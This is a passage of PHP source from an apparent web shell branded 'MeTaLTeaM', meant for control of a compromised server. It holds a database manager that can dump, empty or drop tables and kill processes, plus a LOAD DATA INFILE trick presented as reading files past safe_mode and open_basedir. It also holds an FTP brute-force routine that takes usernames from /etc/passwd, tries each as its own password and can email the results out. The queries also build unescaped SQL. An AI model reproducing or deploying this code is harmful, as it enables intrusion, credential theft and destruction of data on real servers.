1069 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
1070 }
1071 if (in_array($sql_act,$acts))
1072 {
1073 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
1074 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
1075 if ($sql_act == "newtbl")
1076 {
1077 echo "<b>";
1078 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1079 }
1080 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1081 }
1082 elseif ($sql_act == "dump")
1083 {
1084 if (empty($submit))
1085 {
1086 $diplay = FALSE;
1087 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1088 echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1089 $v = join (";",$dmptbls);
1090 echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1091 if ($dump_file) {$tmp = $dump_file;}
1092 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1093 echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1094 echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1095 echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1096 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
1097 echo "</form>";
1098 }
1099 else
1100 {
1101 $diplay = TRUE;
1102 $set = array();
1103 $set["sock"] = $sql_sock;
1104 $set["db"] = $sql_db;
1105 $dump_out = "download";
1106 $set["print"] = 0;
1107 $set["nl2br"] = 0;
1108 $set[""] = 0;
1109 $set["file"] = $dump_file;
1110 $set["add_drop"] = TRUE;
1111 $set["onlytabs"] = array();
1112 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1113 $ret = mysql_dump($set);
1114 if ($sql_dump_download)
1115 {
1116 @ob_clean();
1117 header("Content-type: application/octet-stream");
1118 header("Content-length: ".strlen($ret));
1119 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1120 echo $ret;
1121 exit;
1122 }
1123 elseif ($sql_dump_savetofile)
1124 {
1125 $fp = fopen($sql_dump_file,"w");
1126 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1127 else
1128 {
1129 fwrite($fp,$ret);
1130 fclose($fp);
1131 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1132 }
1133 }
1134 else {echo "<b>Dump: nothing to do!</b>";}
1135 }
1136 }
1137 if ($diplay)
1138 {
1139 if (!empty($sql_tbl))
1140 {
1141 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
1142 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1143 $count_row = mysql_fetch_array($count);
1144 mysql_free_result($count);
1145 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1146 $tbl_struct_fields = array();
1147 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1148 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
1149 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
1150 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
1151 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
1152 $perpage = $sql_tbl_le - $sql_tbl_ls;
1153 if (!is_numeric($perpage)) {$perpage = 10;}
1154 $numpages = $count_row[0]/$perpage;
1155 $e = explode(" ",$sql_order);
1156 if (count($e) == 2)
1157 {
1158 if ($e[0] == "d") {$asc_desc = "DESC";}
1159 else {$asc_desc = "ASC";}
1160 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1161 }
1162 else {$v = "";}
1163 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1164 $result = mysql_query($query) or print(mysql_smarterror());
1165 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1166 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1167 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1168 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1169 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1170 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
1171 if ($sql_tbl_act == "insert")
1172 {
1173 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1174 if (!empty($sql_tbl_insert_radio))
1175 {
1176
1177 }
1178 else
1179 {
1180 echo "<br><br><b>Inserting row into table:</b><br>";
1181 if (!empty($sql_tbl_insert_q))
1182 {
1183 $sql_query = "SELECT * FROM `".$sql_tbl."`";
1184 $sql_query .= " WHERE".$sql_tbl_insert_q;
1185 $sql_query .= " LIMIT 1;";
1186 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1187 $values = mysql_fetch_assoc($result);
1188 mysql_free_result($result);
1189 }
1190 else {$values = array();}
1191 echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
1192 foreach ($tbl_struct_fields as $field)
1193 {
1194 $name = $field["Field"];
1195 if (empty($sql_tbl_insert_q)) {$v = "";}
1196 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1197 $i++;
1198 }
1199 echo "</table><br>";
1200 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1201 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1202 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
1203 }
1204 }
1205 if ($sql_tbl_act == "browse")
1206 {
1207 $sql_tbl_ls = abs($sql_tbl_ls);
1208 $sql_tbl_le = abs($sql_tbl_le);
1209 echo "<hr size=\"1\" noshade>";
1210 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
1211 $b = 0;
1212 for($i=0;$i<$numpages;$i++)
1213 {
1214 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1215 echo $i;
1216 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1217 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1218 else {echo "&nbsp;";}
1219 }
1220 if ($i == 0) {echo "empty";}
1221 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
1222 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>";
1223 echo "<tr>";
1224 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
1225 for ($i=0;$i<mysql_num_fields($result);$i++)
1226 {
1227 $v = mysql_field_name($result,$i);
1228 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1229 else {$s = "a"; $m = "desc";}
1230 echo "<td>";
1231 if (empty($e[0])) {$e[0] = "a";}
1232 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1233 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
1234 echo "</td>";
1235 }
1236 echo "<td><font color=\"green\"><b>Action</b></font></td>";
1237 echo "</tr>";
1238 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1239 {
1240 echo "<tr>";
1241 $w = "";
1242 $i = 0;
1243 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
1244 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
1245 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1246 $i = 0;
1247 foreach ($row as $k=>$v)
1248 {
1249 $v = htmlspecialchars($v);
1250 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1251 echo "<td>".$v."</td>";
1252 $i++;
1253 }
1254 echo "<td>";
1255 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
1256 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
1257 echo "</td>";
1258 echo "</tr>";
1259 }
1260 mysql_free_result($result);
1261 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1262 echo "<option value=\"\">With selected:</option>";
1263 echo "<option value=\"deleterow\">Delete</option>";
1264 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1265 }
1266 }
1267 else
1268 {
1269 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1270 if (!$result) {echo mysql_smarterror();}
1271 else
1272 {
1273 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1274 $i = 0;
1275 $tsize = $trows = 0;
1276 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1277 {
1278 $tsize += $row["Data_length"];
1279 $trows += $row["Rows"];
1280 $size = view_size($row["Data_length"]);
1281 echo "<tr>";
1282 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1283 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
1284 echo "<td>".$row["Rows"]."</td>";
1285 echo "<td>".$row["Type"]."</td>";
1286 echo "<td>".$row["Create_time"]."</td>";
1287 echo "<td>".$row["Update_time"]."</td>";
1288 echo "<td>".$size."</td>";
1289 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
1290 echo "</tr>";
1291 $i++;
1292 }
1293 echo "<tr bgcolor=\"000000\">";
1294 echo "<td><center><b>»</b></center></td>";
1295 echo "<td><center><b>".$i." table(s)</b></center></td>";
1296 echo "<td><b>".$trows."</b></td>";
1297 echo "<td>".$row[1]."</td>";
1298 echo "<td>".$row[10]."</td>";
1299 echo "<td>".$row[11]."</td>";
1300 echo "<td><b>".view_size($tsize)."</b></td>";
1301 echo "<td></td>";
1302 echo "</tr>";
1303 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1304 echo "<option value=\"\">With selected:</option>";
1305 echo "<option value=\"tbldrop\">Drop</option>";
1306 echo "<option value=\"tblempty\">Empty</option>";
1307 echo "<option value=\"tbldump\">Dump</option>";
1308 echo "<option value=\"tblcheck\">Check table</option>";
1309 echo "<option value=\"tbloptimize\">Optimize table</option>";
1310 echo "<option value=\"tblrepair\">Repair table</option>";
1311 echo "<option value=\"tblanalyze\">Analyze table</option>";
1312 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1313 mysql_free_result($result);
1314 }
1315 }
1316 }
1317 }
1318 }
1319 else
1320 {
1321 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
1322 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1323 if (!empty($sql_act))
1324 {
1325 echo "<hr size=\"1\" noshade>";
1326 if ($sql_act == "newdb")
1327 {
1328 echo "<b>";
1329 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1330 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1331 }
1332 if ($sql_act == "serverstatus")
1333 {
1334 $result = mysql_query("SHOW STATUS", $sql_sock);
1335 echo "<center><b>Server-status variables:</b><br><br>";
1336 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1337 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1338 echo "</table></center>";
1339 mysql_free_result($result);
1340 }
1341 if ($sql_act == "servervars")
1342 {
1343 $result = mysql_query("SHOW VARIABLES", $sql_sock);
1344 echo "<center><b>Server variables:</b><br><br>";
1345 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1346 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1347 echo "</table>";
1348 mysql_free_result($result);
1349 }
1350 if ($sql_act == "processes")
1351 {
1352 if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
1353 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1354 echo "<center><b>Processes:</b><br><br>";
1355 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1356 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1357 echo "</table>";
1358 mysql_free_result($result);
1359 }
1360 if ($sql_act == "getfile")
1361 {
1362 $tmpdb = $sql_login."_tmpdb";
1363 $select = mysql_select_db($tmpdb);
1364 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1365 if ($select)
1366 {
1367 $created = FALSE;
1368 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1369 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1370 $result = mysql_query("SELECT * FROM tmp_file;");
1371 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1372 else
1373 {
1374 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1375 $f = "";
1376 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1377 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1378 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1379 mysql_free_result($result);
1380 mysql_query("DROP TABLE tmp_file;");
1381 }
1382 }
1383 mysql_drop_db($tmpdb); //comment it if you want to leave database
1384 }
1385 }
1386 }
1387 }
1388 echo "</td></tr></table>";
1389 if ($sql_sock)
1390 {
1391 $affected = @mysql_affected_rows($sql_sock);
1392 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1393 echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
1394 }
1395 echo "</table>";
1396}
1397if ($act == "mkdir")
1398{
1399 if ($mkdir != $d)
1400 {
1401 if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
1402 elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
1403 echo "<br><br>";
1404 }
1405 $act = $dspact = "ls";
1406}
1407if ($act == "ftpquickbrute")
1408{
1409 echo "<b>Ftp Quick brute:</b><br>";
1410 if (!win) {echo "This functions not work in Windows!<br><br>";}
1411 else
1412 {
1413 function k1r4ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
1414 {
1415 if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
1416 else {$TRUE = TRUE;}
1417 if ($TRUE)
1418 {
1419 $sock = @ftp_connect($host,$port,$timeout);
1420 if (@ftp_login($sock,$login,$pass))
1421 {
1422 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1423 ob_flush();
1424 return TRUE;
1425 }
1426 }
1427 }
1428 if (!empty($submit))
1429 {
1430 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1431 $fp = fopen("/etc/passwd","r");
1432 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1433 else
1434 {
1435 if ($fqb_logging)
1436 {
1437 if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1438 else {$fqb_logfp = FALSE;}
1439 $fqb_log = "FTP Quick Brute (called MeTaLTeaM . oRg".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1440 if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1441 }
1442 ob_flush();
1443 $i = $success = 0;
1444 $ftpquick_st = getmicrotime();
1445 while(!feof($fp))
1446 {
1447 $str = explode(":",fgets($fp,2048));
1448 if (k1r4ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
1449 {
1450 echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1451 $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1452 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1453 $success++;
1454 ob_flush();
1455 }
1456 if ($i > $fqb_lenght) {break;}
1457 $i++;
1458 }
1459 if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1460 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1461 echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1462 $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1463 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1464 if ($fqb_logemail) {@mail($fqb_logemail,"MeTaLTeaM ".$shver." report",$fqb_log);}
1465 fclose($fqb_logfp);
1466 }
1467 }
1468 else
1469 {
1470 $logfile = $tmpdir_logs."k1r4_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1471 $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1472 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
1473 }
